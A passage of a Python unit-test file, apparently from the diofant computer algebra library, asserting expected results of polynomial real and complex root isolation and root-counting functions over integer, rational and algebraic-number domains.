ans = sorted((s*_, s*_) for _ in range(1, r))
assert R._isolate_real_roots_sqf(f) == ans
assert R._isolate_real_roots_sqf(x**2 - 5) == [(-3, -2), (2, 3)]
assert R._isolate_real_roots_sqf(x**3 - 5) == [(1, 2)]
assert R._isolate_real_roots_sqf(x**4 - 5) == [(-2, -1), (1, 2)]
assert R._isolate_real_roots_sqf(x**5 - 5) == [(1, 2)]
assert R._isolate_real_roots_sqf(x**6 - 5) == [(-2, -1), (1, 2)]
assert R._isolate_real_roots_sqf(x**7 - 5) == [(1, 2)]
assert R._isolate_real_roots_sqf(x**8 - 5) == [(-2, -1), (1, 2)]
assert R._isolate_real_roots_sqf(x**9 - 5) == [(1, 2)]
for roots in subsets(range(1, 4)):
f = R(math.prod(x - r for r in roots))
ans = sorted((_, _) for _ in roots)
assert R._isolate_real_roots_sqf(f) == ans
assert R._isolate_real_roots_sqf((x - 3)*(x - 2)*(x - 1)*(x + 1)*(x + 2)*(x + 3)*(2*x + 1)) == \
[(-3, -3), (-2, -2), (-1, -1), (-1, 0), (1, 1), (2, 2), (3, 3)]
assert R._isolate_real_roots_sqf((x - 3)*(x - 2)*(x - 1)*(x + 1)*(x + 2)*(x + 3)*(2*x - 1)*(2*x + 1)) == \
[(-3, -3), (-2, -2), (-1, -1), (-1, 0), (0, 1), (1, 1), (2, 2), (3, 3)]
f = 9*x**2 - 2
assert R._isolate_real_roots_sqf(f) == \
[(-1, 0), (0, 1)]
assert R._isolate_real_roots_sqf(f, eps=QQ(1, 10)) == \
[(QQ(-1, 2), QQ(-3, 7)), (QQ(3, 7), QQ(1, 2))]
assert R._isolate_real_roots_sqf(f, eps=QQ(1, 100)) == \
[(QQ(-9, 19), QQ(-8, 17)), (QQ(8, 17), QQ(9, 19))]
assert R._isolate_real_roots_sqf(f, eps=QQ(1, 1000)) == \
[(QQ(-33, 70), QQ(-8, 17)), (QQ(8, 17), QQ(33, 70))]
assert R._isolate_real_roots_sqf(f, eps=QQ(1, 10000)) == \
[(QQ(-33, 70), QQ(-107, 227)), (QQ(107, 227), QQ(33, 70))]
assert R._isolate_real_roots_sqf(f, eps=QQ(1, 100000)) == \
[(QQ(-305, 647), QQ(-272, 577)), (QQ(272, 577), QQ(305, 647))]
assert R._isolate_real_roots_sqf(f, eps=QQ(1, 1000000)) == \
[(QQ(-1121, 2378), QQ(-272, 577)), (QQ(272, 577), QQ(1121, 2378))]
f = (x - 2)*(x - 1)*(2*x - 1)*(10002*x - 1)*(10003*x - 1)
assert R._isolate_real_roots_sqf(f) == \
[(QQ(15, 150046), QQ(47, 470110)), (QQ(47, 470110), QQ(17, 170018)),
(QQ(1, 2), QQ(1, 2)), (1, 1), (2, 2)]
assert R._isolate_real_roots_sqf(f, eps=QQ(1, 100000000000)) == \
[(QQ(1, 10003), QQ(1, 10003)), (QQ(1, 10002), QQ(1, 10002)),
(QQ(1, 2), QQ(1, 2)), (1, 1), (2, 2)]
a, b, c, d = 10000090000001, 2000100003, 10000300007, 10000005000008
f = (x - d)*(x + a)*(b*x + 1)*(c*x - 1)
assert R._isolate_real_roots_sqf(f) == \
[(-13194139533313, -8796093022209), (-1, 0), (0, 1),
(8796093022209, 13194139533313)]
assert R._isolate_real_roots_sqf(f, eps=QQ(1, 100000000000)) == \
[(-a, -a), (QQ(-7, 13958643719), QQ(-1, 2013265921)),
(QQ(3, 30064771075), QQ(1, 9663676417)),
(QQ(1328823874562668133568119, 132882321015),
QQ(37336367728494399224248237, 3733634906029))]
assert R._isolate_real_roots_sqf(f, eps=QQ(1, 100000000000000000000000000000)) == \
[(-a, -a), (-QQ(1, b), -QQ(1, b)), (QQ(1, c), QQ(1, c)), (d, d)]
f = -2*(x - 2)*(x + 2)*(5*x**2 - 4*x - 20)
assert R._isolate_real_roots_sqf(f) == \
[(-2, -2), (-2, -1), (2, 2), (2, 3)]
assert R._isolate_real_roots_sqf(f, eps=QQ(1, 100)) == \
[(-2, -2), (-QQ(23, 14), -QQ(18, 11)), (2, 2), (QQ(39, 16), QQ(22, 9))]
f = x - 1
assert R._isolate_real_roots_sqf(f, inf=2) == []
assert R._isolate_real_roots_sqf(f, sup=0) == []
assert R._isolate_real_roots_sqf(f) == [(1, 1)]
assert R._isolate_real_roots_sqf(f, inf=1) == [(1, 1)]
assert R._isolate_real_roots_sqf(f, sup=1) == [(1, 1)]
assert R._isolate_real_roots_sqf(f, inf=1, sup=1) == [(1, 1)]
f = x**2 - 2
assert R._isolate_real_roots_sqf(f, inf=QQ(7, 4)) == []
assert R._isolate_real_roots_sqf(f, inf=QQ(7, 5)) == [(QQ(7, 5), QQ(3, 2))]
assert R._isolate_real_roots_sqf(f, sup=QQ(7, 5)) == [(-2, -1)]
assert R._isolate_real_roots_sqf(f, sup=QQ(7, 4)) == [(-2, -1), (1, QQ(3, 2))]
assert R._isolate_real_roots_sqf(f, sup=-QQ(7, 4)) == []
assert R._isolate_real_roots_sqf(f, sup=-QQ(7, 5)) == [(-QQ(3, 2), -QQ(7, 5))]
assert R._isolate_real_roots_sqf(f, inf=-QQ(7, 5)) == [(1, 2)]
assert R._isolate_real_roots_sqf(f, inf=-QQ(7, 4)) == [(-QQ(3, 2), -1), (1, 2)]
i = [(-2, -1), (1, 2)]
assert R._isolate_real_roots_sqf(f, inf=-2) == i
assert R._isolate_real_roots_sqf(f, sup=+2) == i
assert R._isolate_real_roots_sqf(f, inf=-2, sup=2) == i
assert R._isolate_real_roots_sqf(f, inf=+1) == [i[1]]
assert R._isolate_real_roots_sqf(f, sup=-1) == [i[0]]
f = (2*x - 3)*(x**2 - 3)*(x**2 - 2)
assert R._isolate_real_roots_sqf(f) == \
[(-2, -QQ(3, 2)), (-QQ(3, 2), -QQ(1, 1)), (1, QQ(3, 2)),
(QQ(3, 2), QQ(3, 2)), (QQ(3, 2), 2)]
f = 7*x**4 - 19*x**3 + 20*x**2 + 17*x + 20
assert R._isolate_real_roots_sqf(f) == []
R, x = ring('x', QQ)
f = (6*x - 85)*(1028*x + 1)/3855
assert R._isolate_real_roots_sqf(f) == [(-1, 0), (14, 15)]
assert [_.as_tuple() for _ in R._isolate_real_roots_sqf(f, blackbox=True)] == [(-1, 0), (14, 15)]
f = (2*x/5 - QQ(17, 3))*(4*x + QQ(1, 257))
assert R._isolate_real_roots_sqf(f) == [(-1, 0), (14, 15)]
R, x = ring('x', EX)
pytest.raises(DomainError, lambda: R._isolate_real_roots_sqf(x + 3))
R, x = ring('x', QQ.algebraic_field(I))
f = (x - 1)*(x**3 + I*x - 2)
assert R._isolate_real_roots_sqf(f) == [(1, 1)]
assert R._isolate_real_roots_sqf(f, sup=0) == []
f = (x**2 - 2)*(x**3 - x + I)
assert R._isolate_real_roots_sqf(f) == [(QQ(-3, 2), QQ(-4, 3)), (QQ(4, 3), QQ(3, 2))]
assert R._isolate_real_roots_sqf(f, eps=QQ(1, 10), inf=0) == [(QQ(7, 5), QQ(10, 7))]
assert R._isolate_real_roots_sqf(x) == [(0, 0)]
assert R._isolate_real_roots_sqf(x - 1) == [(1, 1)]
assert R._isolate_real_roots_sqf(x - I) == []
f = (x + I)*(x - 1)
assert [_.as_tuple() for _ in R._isolate_real_roots_sqf(f, blackbox=True)] == [(1, 1)]
R, x = ring('x', QQ.algebraic_field(sqrt(2)))
f = (-x**3 + sqrt(2)*x - 1)*(x**2 + 1)
assert R._isolate_real_roots_sqf(f) == [(-2, -1)]
assert R._isolate_real_roots_sqf(f, eps=QQ(1, 1000)) == [(QQ(-132, 91), QQ(-29, 20))]
f = (x - sqrt(2))*(x + 2*sqrt(2))*(x - 7 + sqrt(2))*(x + 3*sqrt(2))*(x - 1)*(x + 1 - sqrt(2))
assert R._isolate_real_roots_sqf(f) == [(-5, -4), (-3, -2), (0, 1),
(1, 1), (1, 2), (5, 6)]
R, x = ring('x', QQ.algebraic_field(sqrt(2), sqrt(3)))
f = (x - sqrt(2))*(x - sqrt(3))*(x - 2*sqrt(6))*(x - sqrt(6))*(x**2 + 2)
assert R._isolate_real_roots_sqf(f) == [(1, QQ(3, 2)), (QQ(3, 2), 2),
(2, 3), (4, 5)]
assert (R._isolate_real_roots_sqf(f, eps=QQ(1, 1000)) ==
[(QQ(41, 29), QQ(58, 41)), (QQ(71, 41), QQ(97, 56)),
(QQ(218, 89), QQ(49, 20)), (QQ(436, 89), QQ(485, 99))])
def test__isolate_real_roots():
R, x = ring('x', ZZ)
assert R._isolate_real_roots(R(0)) == []
assert R._isolate_real_roots(R(1)) == []
assert R._isolate_real_roots(R(3)) == []
assert R._isolate_real_roots(x) == [((0, 0), 1)]
assert R._isolate_real_roots(5*x) == [((0, 0), 1)]
assert R._isolate_real_roots(7*x**4) == [((0, 0), 4)]
assert R._isolate_real_roots(x**128) == [((0, 0), 128)]
assert R._isolate_real_roots(x*(x + 1)) == [((-1, -1), 1), ((0, 0), 1)]
assert R._isolate_real_roots(x*(x - 1)) == [((0, 0), 1), ((1, 1), 1)]
assert R._isolate_real_roots(x**4 + x + 1) == []
i = [((-2, -1), 1), ((1, 2), 1)]
assert R._isolate_real_roots(+x**2 - 2) == i
assert R._isolate_real_roots(-x**2 + 2) == i
f = (2*x - 3)**4*(x**2 - 3)**2*(x**2 - 2)**3
assert R._isolate_real_roots(f) == \
[((-2, -QQ(3, 2)), 2), ((-QQ(3, 2), -QQ(1, 1)), 3), ((1, QQ(3, 2)), 3),
((QQ(3, 2), QQ(3, 2)), 4), ((QQ(5, 3), 2), 2)]
f = (2*x - 3)*(x**2 - 3)*(x**2 - 2)
assert R._isolate_real_roots(f) == \
[((-2, -QQ(3, 2)), 1), ((-QQ(3, 2), -QQ(1, 1)), 1), ((1, QQ(3, 2)), 1),
((QQ(3, 2), QQ(3, 2)), 1), ((QQ(3, 2), 2), 1)]
f = x - 1
assert R._isolate_real_roots(f, inf=2) == []
assert R._isolate_real_roots(f, sup=0) == []
assert R._isolate_real_roots(f) == [((1, 1), 1)]
assert R._isolate_real_roots(f, inf=1) == [((1, 1), 1)]
assert R._isolate_real_roots(f, sup=1) == [((1, 1), 1)]
assert R._isolate_real_roots(f, inf=1, sup=1) == [((1, 1), 1)]
f = (x**2 - 2)**2
assert R._isolate_real_roots(f, inf=QQ(7, 4)) == []
assert R._isolate_real_roots(f, inf=QQ(7, 5)) == [((QQ(7, 5), QQ(3, 2)), 2)]
assert R._isolate_real_roots(f, sup=QQ(7, 5)) == [((-2, -1), 2)]
assert R._isolate_real_roots(f, sup=QQ(7, 4)) == [((-2, -1), 2), ((1, QQ(3, 2)), 2)]
assert R._isolate_real_roots(f, sup=-QQ(7, 4)) == []
assert R._isolate_real_roots(f, sup=-QQ(7, 5)) == [((-QQ(3, 2), -QQ(7, 5)), 2)]
assert R._isolate_real_roots(f, inf=-QQ(7, 5)) == [((1, 2), 2)]
assert R._isolate_real_roots(f, inf=-QQ(7, 4)) == [((-QQ(3, 2), -1), 2), ((1, 2), 2)]
i = [((-2, -1), 2), ((1, 2), 2)]
assert R._isolate_real_roots(f, inf=-2) == i
assert R._isolate_real_roots(f, sup=+2) == i
assert R._isolate_real_roots(f, inf=-2, sup=2) == i
f = x**4*(x - 1)**3*(x**2 - 2)**2
assert R._isolate_real_roots(f) == \
[((-2, -1), 2), ((0, 0), 4), ((1, 1), 3), ((1, 2), 2)]
f = x**45 - 45*x**44 + 990*x**43 - 1
g = (x**46 - 15180*x**43 + 9366819*x**40 - 53524680*x**39 +
260932815*x**38 - 1101716330*x**37 + 4076350421*x**36 -
13340783196*x**35 + 38910617655*x**34 - 101766230790*x**33 +
239877544005*x**32 - 511738760544*x**31 + 991493848554*x**30 -
1749695026860*x**29 + 2818953098830*x**28 - 4154246671960*x**27 +
5608233007146*x**26 - 6943526580276*x**25 + 7890371113950*x**24 -
8233430727600*x**23 + 7890371113950*x**22 - 6943526580276*x**21 +
5608233007146*x**20 - 4154246671960*x**19 + 2818953098830*x**18 -
1749695026860*x**17 + 991493848554*x**16 - 511738760544*x**15 +
239877544005*x**14 - 101766230790*x**13 + 38910617655*x**12 -
13340783196*x**11 + 4076350421*x**10 - 1101716330*x**9 +
260932815*x**8 - 53524680*x**7 + 9366819*x**6 - 1370754*x**5 +
163185*x**4 - 15180*x**3 + 1035*x**2 - 47*x + 1)
assert R._isolate_real_roots(f*g) == \
[((0, QQ(1, 2)), 1), ((QQ(2, 3), QQ(3, 4)), 1), ((QQ(3, 4), 1), 1), ((6, 7), 1), ((24, 25), 1)]
f = x**2 - 3
assert R._isolate_real_roots(f) == [((-2, -1), 1), ((1, 2), 1)]
assert R._isolate_real_roots(f, eps=QQ(1, 100)) == [((QQ(-26, 15), QQ(-19, 11)), 1), ((QQ(19, 11), QQ(26, 15)), 1)]
f = x**4 - 4*x**2 + 4
assert R._isolate_real_roots(f, inf=QQ(7, 4)) == []
assert R._isolate_real_roots(f, inf=QQ(7, 5)) == [((QQ(7, 5), QQ(3, 2)), 2)]
assert R._isolate_real_roots(f, sup=QQ(7, 4)) == [((-2, -1), 2), ((1, QQ(3, 2)), 2)]
assert R._isolate_real_roots(f, sup=QQ(7, 5)) == [((-2, -1), 2)]
f = (x**2 - 2)*(x**2 - 3)**7*(x + 1)*(7*x + 3)**3
assert R._isolate_real_roots(f) == [((-2, -QQ(3, 2)), 7), ((-QQ(3, 2), -1), 1),
((-1, -1), 1), ((-1, 0), 3),
((1, QQ(3, 2)), 1), ((QQ(3, 2), 2), 7)]
f = 7*x**4 - 19*x**3 + 20*x**2 + 17*x + 20
assert R._isolate_real_roots(f) == []
R, x = ring('x', QQ)
f = (2*x/5 - QQ(17, 3))*(4*x + QQ(1, 257))
assert R._isolate_real_roots(f) == [((-1, 0), 1), ((14, 15), 1)]
assert R._isolate_real_roots(f, eps=QQ(1, 10)) == [((-QQ(1, 513), 0), 1), ((QQ(85, 6), QQ(85, 6)), 1)]
assert R._isolate_real_roots(f, eps=QQ(1, 100)) == [((-QQ(1, 513), 0), 1), ((QQ(85, 6), QQ(85, 6)), 1)]
assert R._isolate_real_roots(f, eps=QQ(1, 1000)) == [((-QQ(1, 1025), 0), 1), ((QQ(85, 6), QQ(85, 6)), 1)]
assert R._isolate_real_roots(f, eps=QQ(1, 10000)) == [((-QQ(1, 1025), -QQ(65, 66881)), 1), ((QQ(85, 6), QQ(85, 6)), 1)]
R, x = ring('x', EX)
pytest.raises(DomainError, lambda: R._isolate_real_roots(x + 3))
pytest.raises(DomainError, lambda: R._isolate_real_roots((x + 2)*(x + 3)**2))
R, x = ring('x', QQ.algebraic_field(I))
f = (x**2 - I)**2*(x - 2*I)**3
assert R._isolate_real_roots(f) == [] # issue diofant/diofant#789
assert R._isolate_real_roots(f*(x - 1)**3) == [((1, 1), 3)]
f = x**4*(x - 1)**3*(x**2 - 2)**2
assert R._isolate_real_roots(f) == \
[((-2, -1), 2), ((0, 0), 4), ((1, 1), 3), ((QQ(4, 3), QQ(3, 2)), 2)]
def test__isolate_real_roots_pair():
R, x = ring('x', ZZ)
assert R._isolate_real_roots_pair(x*(x + 1), x) == \
[((-1, -1), {0: 1}), ((0, 0), {0: 1, 1: 1})]
assert R._isolate_real_roots_pair(x*(x - 1), x) == \
[((0, 0), {0: 1, 1: 1}), ((1, 1), {0: 1})]
f, g = (x**2 - 2)**2, x - 1
assert R._isolate_real_roots_pair(f, g, inf=QQ(7, 4)) == []
assert R._isolate_real_roots_pair(f, g, inf=QQ(7, 5)) == \
[((QQ(7, 5), QQ(3, 2)), {0: 2})]
assert R._isolate_real_roots_pair(f, g, sup=QQ(7, 5)) == \
[((-2, -1), {0: 2}), ((1, 1), {1: 1})]
assert R._isolate_real_roots_pair(f, g, sup=QQ(7, 4)) == \
[((-2, -1), {0: 2}), ((1, 1), {1: 1}), ((1, QQ(3, 2)), {0: 2})]
assert R._isolate_real_roots_pair(f, g, sup=-QQ(7, 4)) == []
assert R._isolate_real_roots_pair(f, g, sup=-QQ(7, 5)) == \
[((-QQ(3, 2), -QQ(7, 5)), {0: 2})]
assert R._isolate_real_roots_pair(f, g, inf=-QQ(7, 5)) == \
[((1, 1), {1: 1}), ((1, 2), {0: 2})]
assert R._isolate_real_roots_pair(f, g, inf=-QQ(7, 4)) == \
[((-QQ(3, 2), -1), {0: 2}), ((1, 1), {1: 1}), ((1, 2), {0: 2})]
f, g = 2*x**2 - 1, x**2 - 2
assert R._isolate_real_roots_pair(f, g) == \
[((-2, -1), {1: 1}), ((-1, 0), {0: 1}),
((0, 1), {0: 1}), ((1, 2), {1: 1})]
assert R._isolate_real_roots_pair(f, g, strict=True) == \
[((-QQ(3, 2), -QQ(4, 3)), {1: 1}), ((-1, -QQ(2, 3)), {0: 1}),
((QQ(2, 3), 1), {0: 1}), ((QQ(4, 3), QQ(3, 2)), {1: 1})]
f, g = x**2 - 2, (x - 1)*(x**2 - 2)
assert R._isolate_real_roots_pair(f, g) == \
[((-2, -1), {1: 1, 0: 1}), ((1, 1), {1: 1}), ((1, 2), {1: 1, 0: 1})]
f, g = x*(x**2 - 2), x**2*(x - 1)*(x**2 - 2)
assert R._isolate_real_roots_pair(f, g) == \
[((-2, -1), {1: 1, 0: 1}), ((0, 0), {0: 1, 1: 2}),
((1, 1), {1: 1}), ((1, 2), {1: 1, 0: 1})]
f, g = x**2*(x - 1)**3*(x**2 - 2)**2, x*(x - 1)**2*(x**2 + 2)
_x = R.clone(domain=ZZ.field).x
assert R._isolate_real_roots_pair(f, g) == \
[((-2, -1), {0: 2}), ((0, 0), {0: 2, 1: 1}),
((1, 1), {0: 3, 1: 2}), ((1, 2), {0: 2})]
assert R._isolate_real_roots_pair(f, g, basis=True) == \
[((-2, -1), {0: 2}, _x**2 - 2), ((0, 0), {0: 2, 1: 1}, _x),
((1, 1), {0: 3, 1: 2}, _x - 1), ((1, 2), {0: 2}, _x**2 - 2)]
f, g = x, R.zero
assert R._isolate_real_roots_pair(f, g) == \
R._isolate_real_roots_pair(g, f) == [((0, 0), {0: 1, 1: 1})]
f *= x**2
assert R._isolate_real_roots_pair(f, g) == \
R._isolate_real_roots_pair(g, f) == [((0, 0), {0: 3, 1: 3})]
R, x = ring('x', EX)
pytest.raises(DomainError, lambda: R._isolate_real_roots_pair(x, x + 3))
R, x = ring('x', ZZ)
f, g = x**5 - 200, x**5 - 201
assert R._isolate_real_roots_pair(f, g) == \
[((QQ(75, 26), QQ(101, 35)), {0: 1}), ((QQ(309, 107), QQ(26, 9)), {1: 1})]
R, x = ring('x', QQ)
f, g = -x**5/200 + 1, -x**5/201 + 1
assert R._isolate_real_roots_pair(f, g) == \
[((QQ(75, 26), QQ(101, 35)), {0: 1}), ((QQ(309, 107), QQ(26, 9)), {1: 1})]
def test__count_real_roots():
R, x = ring('x', ZZ)
assert R._count_real_roots(R(0)) == 0
assert R._count_real_roots(R(7)) == 0
f = x - 1
assert R._count_real_roots(f) == 1
assert R._count_real_roots(f, inf=1) == 1
assert R._count_real_roots(f, sup=0) == 0
assert R._count_real_roots(f, sup=1) == 1
assert R._count_real_roots(f, inf=0, sup=1) == 1
assert R._count_real_roots(f, inf=0, sup=2) == 1
assert R._count_real_roots(f, inf=1, sup=2) == 1
f = x**2 - 2
assert R._count_real_roots(f) == 2
assert R._count_real_roots(f, sup=0) == 1
assert R._count_real_roots(f, inf=-1, sup=1) == 0
R, x = ring('x', QQ.algebraic_field(I))
f = x**3 + I*x + 2
assert R._count_real_roots(f) == 0
f *= (x - 1)*(x + 1)
assert R._count_real_roots(f) == 2
# parameters for test_dup_count_complex_roots_n(): n = 1..8
a, b = (-1, -1), (1, 1)
c, d = (+0, +0), (1, 1)
def test__count_complex_roots_1():
R, x = ring('x', ZZ)
f = x - 1
assert R._count_complex_roots(f, a, b) == 1
assert R._count_complex_roots(f, c, d) == 1
f = -f
assert R._count_complex_roots(f, a, b) == 1
assert R._count_complex_roots(f, c, d) == 1
f = x + 1
assert R._count_complex_roots(f, a, b) == 1
assert R._count_complex_roots(f, c, d) == 0
R, x = ring('x', QQ)
f = x - QQ(1, 2)
assert R._count_complex_roots(f, c, d) == 1
R, x = ring('x', EX)
pytest.raises(DomainError, lambda: R._count_complex_roots(x))
def test__count_complex_roots_2():
R, x = ring('x', ZZ)
f = x*(x - 1)
assert R._count_complex_roots(f, a, b) == 2
assert R._count_complex_roots(f, c, d) == 2
f = -f
assert R._count_complex_roots(f, a, b) == 2
assert R._count_complex_roots(f, c, d) == 2
f = x*(x + 1)
assert R._count_complex_roots(f, a, b) == 2
assert R._count_complex_roots(f, c, d) == 1
f = -f
assert R._count_complex_roots(f, a, b) == 2
assert R._count_complex_roots(f, c, d) == 1
def test__count_complex_roots_3():
R, x = ring('x', ZZ)
f = (x - 1)*(x + 1)
assert R._count_complex_roots(f, a, b) == 2
assert R._count_complex_roots(f, c, d) == 1
f = x*(x - 1)*(x + 1)
assert R._count_complex_roots(f, a, b) == 3
assert R._count_complex_roots(f, c, d) == 2
f = -f
assert R._count_complex_roots(f, a, b) == 3
assert R._count_complex_roots(f, c, d) == 2
def test__count_complex_roots_4():
R, x = ring('x', ZZ)
f = x**2 + 1
assert R._count_complex_roots(f, a, b) == 2
assert R._count_complex_roots(f, c, d) == 1
f = x*(x**2 + 1)
assert R._count_complex_roots(f, a, b) == 3
assert R._count_complex_roots(f, c, d) == 2
f = -f
assert R._count_complex_roots(f, a, b) == 3
assert R._count_complex_roots(f, c, d) == 2
f = (x**2 + 1)*(x - 1)
assert R._count_complex_roots(f, a, b) == 3
assert R._count_complex_roots(f, c, d) == 2
f *= x
assert R._count_complex_roots(f, a, b) == 4
assert R._count_complex_roots(f, c, d) == 3
f = -f
assert R._count_complex_roots(f, a, b) == 4
assert R._count_complex_roots(f, c, d) == 3
f = (x**2 + 1)*(x - 1)*(x + 1)
assert R._count_complex_roots(f, a, b) == 4
assert R._count_complex_roots(f, c, d) == 2
f *= x
assert R._count_complex_roots(f, a, b) == 5
assert R._count_complex_roots(f, c, d) == 3
f = -f
assert R._count_complex_roots(f, a, b) == 5
assert R._count_complex_roots(f, c, d) == 3
def test__count_complex_roots_5():
R, x = ring('x', ZZ)
f = (x + 1)**2 + 1
assert R._count_complex_roots(f, a, b) == 2
assert R._count_complex_roots(f, c, d) == 0
f = ((x + 1)**2 + 1)*(x - 1)
assert R._count_complex_roots(f, a, b) == 3
assert R._count_complex_roots(f, c, d) == 1
f *= x
assert R._count_complex_roots(f, a, b) == 4
assert R._count_complex_roots(f, c, d) == 2
f = ((x + 1)**2 + 1)*(x + 1)
assert R._count_complex_roots(f, a, b) == 3
assert R._count_complex_roots(f, c, d) == 0
f *= x
assert R._count_complex_roots(f, a, b) == 4
assert R._count_complex_roots(f, c, d) == 1
f = ((x + 1)**2 + 1)*(x - 1)*(x + 1)
assert R._count_complex_roots(f, a, b) == 4
assert R._count_complex_roots(f, c, d) == 1
f *= x
assert R._count_complex_roots(f, a, b) == 5
assert R._count_complex_roots(f, c, d) == 2
def test__count_complex_roots_6():
R, x = ring('x', ZZ)
f = (x - 1)**2 + 1
assert R._count_complex_roots(f, a, b) == 2
assert R._count_complex_roots(f, c, d) == 1
f *= x - 1
assert R._count_complex_roots(f, a, b) == 3
assert R._count_complex_roots(f, c, d) == 2
f *= x
assert R._count_complex_roots(f, a, b) == 4
assert R._count_complex_roots(f, c, d) == 3
f = ((x - 1)**2 + 1)*(x + 1)
assert R._count_complex_roots(f, a, b) == 3
assert R._count_complex_roots(f, c, d) == 1
f *= x
assert R._count_complex_roots(f, a, b) == 4
assert R._count_complex_roots(f, c, d) == 2
f = ((x - 1)**2 + 1)*(x - 1)*(x + 1)
assert R._count_complex_roots(f, a, b) == 4
assert R._count_complex_roots(f, c, d) == 2
f *= x
assert R._count_complex_roots(f, a, b) == 5
assert R._count_complex_roots(f, c, d) == 3
def test__count_complex_roots_7():
R, x = ring('x', ZZ)
f = ((x - 1)**2 + 1)*((x + 1)**2 + 1)
assert R._count_complex_roots(f, a, b) == 4
assert R._count_complex_roots(f, c, d) == 1
f *= (x - 2)
assert R._count_complex_roots(f, a, b) == 4
assert R._count_complex_roots(f, c, d) == 1
f = ((x - 1)**2 + 1)*((x + 1)**2 + 1)*(x**2 - 2)
assert R._count_complex_roots(f, a, b) == 4
assert R._count_complex_roots(f, c, d) == 1
f = ((x - 1)**2 + 1)*((x + 1)**2 + 1)*(x - 1)
assert R._count_complex_roots(f, a, b) == 5
assert R._count_complex_roots(f, c, d) == 2
f *= x
assert R._count_complex_roots(f, a, b) == 6
assert R._count_complex_roots(f, c, d) == 3
f = ((x - 1)**2 + 1)*((x + 1)**2 + 1)*(x + 1)
assert R._count_complex_roots(f, a, b) == 5
assert R._count_complex_roots(f, c, d) == 1
f *= x
assert R._count_complex_roots(f, a, b) == 6
assert R._count_complex_roots(f, c, d) == 2
f = ((x - 1)**2 + 1)*((x + 1)**2 + 1)*(x - 1)*(x + 1)
assert R._count_complex_roots(f, a, b) == 6
assert R._count_complex_roots(f, c, d) == 2
f *= x
assert R._count_complex_roots(f, a, b) == 7
assert R._count_complex_roots(f, c, d) == 3
f = ((x - 1)**2 + 1)*((x + 1)**2 + 1)*(x - 1)*(x + 1)*(x**2 + 1)
assert R._count_complex_roots(f, a, b) == 8
assert R._count_complex_roots(f, c, d) == 3
def test__count_complex_roots_8():
R, x = ring('x', ZZ)
f = ((x - 1)**2 + 1)*((x + 1)**2 + 1)*(x - 1)*(x + 1)*(x**2 + 1)*x
assert R._count_complex_roots(f, a, b) == 9
assert R._count_complex_roots(f, c, d) == 4
f *= (x**2 - 2)
assert R._count_complex_roots(f, a, b) == 9
assert R._count_complex_roots(f, c, d) == 4
def test__count_complex_roots_9():
R, x = ring('x', QQ.algebraic_field(sqrt(2)))
f = -x**3 + sqrt(2)*x - 1
assert R._count_complex_roots(f, a, b) == 2
assert R._count_complex_roots(f, c, d) == 1
R, x = ring('x', QQ.algebraic_field(sqrt(2)).algebraic_field(I))
f = -x**3 + I*x**2 + sqrt(2)*x - 1
assert R._count_complex_roots(f, a, b) == 2
assert R._count_complex_roots(f, c, d) == 1
def test__count_complex_roots_implicit():
R, x = ring('x', ZZ)
f = (x**2 + 1)*(x - 1)*(x + 1)*x
assert R._count_complex_roots(f) == 5
assert R._count_complex_roots(f, sup=(0, 0)) == 3
assert R._count_complex_roots(f, inf=(0, 0)) == 3
assert R._count_complex_roots(f, inf=QQ(-2), sup=QQ(-1)) == 1
def test__count_complex_roots_exclude():
R, x = ring('x', ZZ)
f = (x**2 + 1)*(x - 1)*(x + 1)*x
a, b = (-1, 0), (1, 1)
assert R._count_complex_roots(f, a, b) == 4
assert R._count_complex_roots(f, a, b, exclude=['S']) == 3
assert R._count_complex_roots(f, a, b, exclude=['N']) == 3
assert R._count_complex_roots(f, a, b, exclude=['S', 'N']) == 2
assert R._count_complex_roots(f, a, b, exclude=['E']) == 4
assert R._count_complex_roots(f, a, b, exclude=['W']) == 4
assert R._count_complex_roots(f, a, b, exclude=['E', 'W']) == 4
assert R._count_complex_roots(f, a, b, exclude=['N', 'S', 'E', 'W']) == 2
assert R._count_complex_roots(f, a, b, exclude=['SW']) == 3
assert R._count_complex_roots(f, a, b, exclude=['SE']) == 3
assert R._count_complex_roots(f, a, b, exclude=['SW', 'SE']) == 2
assert R._count_complex_roots(f, a, b, exclude=['SW', 'SE', 'S']) == 1
assert R._count_complex_roots(f, a, b, exclude=['SW', 'SE', 'S', 'N']) == 0
a, b = (0, 0), (1, 1)
assert R._count_complex_roots(f, a, b, exclude=True) == 1
R, x = ring('x', QQ.algebraic_field(I))
f = x**4 + I*x**3 - x + 1
assert R._count_complex_roots(f, inf=(0, 0), sup=(1, 1)) == 1
r = R._isolate_complex_roots_sqf(f)
assert r == [((QQ(-201, 100), QQ(-201, 100)), (0, 0)),
((QQ(-201, 100), 0), (0, QQ(201, 100))),
((0, QQ(-201, 100)), (QQ(201, 100), 0)),
((0, 0), (QQ(201, 100), QQ(201, 100)))]
assert all(R._count_complex_roots(f, inf=i, sup=s) == 1
for i, s in r)
def test__isolate_complex_roots_sqf():
R, x = ring('x', ZZ)
f = x**2 - 2*x + 3
assert R._isolate_complex_roots_sqf(f) == \
[((0, -6), (6, 0)), ((0, 0), (6, 6))]
assert [r.as_tuple() for r in R._isolate_complex_roots_sqf(f, blackbox=True)] == \
[((0, -6), (6, 0)), ((0, 0), (6, 6))]
assert R._isolate_complex_roots_sqf(f, inf=1, sup=3) == [((1, -3), (3, 0)), ((1, 0), (3, 3))]
assert R._isolate_complex_roots_sqf(f, inf=(1, 0), sup=3) == [((1, 0), (3, 3))]
assert R._isolate_complex_roots_sqf(f, inf=(1, QQ(-1, 2)), sup=3) == [((1, 0), (3, 3))]
assert R._isolate_complex_roots_sqf(f, inf=(1, -3), sup=(3, -1)) == [((1, -3), (3, -1))]
assert R._isolate_complex_roots_sqf(f, inf=0, sup=QQ(1, 6)) == []
assert R._isolate_complex_roots_sqf(R.zero) == []
pytest.raises(ValueError, lambda: R._isolate_complex_roots_sqf(f, inf=1, sup=1))
assert R._isolate_complex_roots_sqf(f, eps=QQ(1, 10)) == \
[((QQ(15, 16), -QQ(3, 2)), (QQ(33, 32), -QQ(45, 32))),
((QQ(15, 16), QQ(45, 32)), (QQ(33, 32), QQ(3, 2)))]
assert R._isolate_complex_roots_sqf(f, eps=QQ(1, 100)) == \
[((QQ(255, 256), -QQ(363, 256)), (QQ(513, 512), -QQ(723, 512))),
((QQ(255, 256), QQ(723, 512)), (QQ(513, 512), QQ(363, 256)))]
f = 7*x**4 - 19*x**3 + 20*x**2 + 17*x + 20
assert R._isolate_complex_roots_sqf(f) == \
[((-QQ(40, 7), -QQ(40, 7)), (0, 0)), ((-QQ(40, 7), 0), (0, QQ(40, 7))),
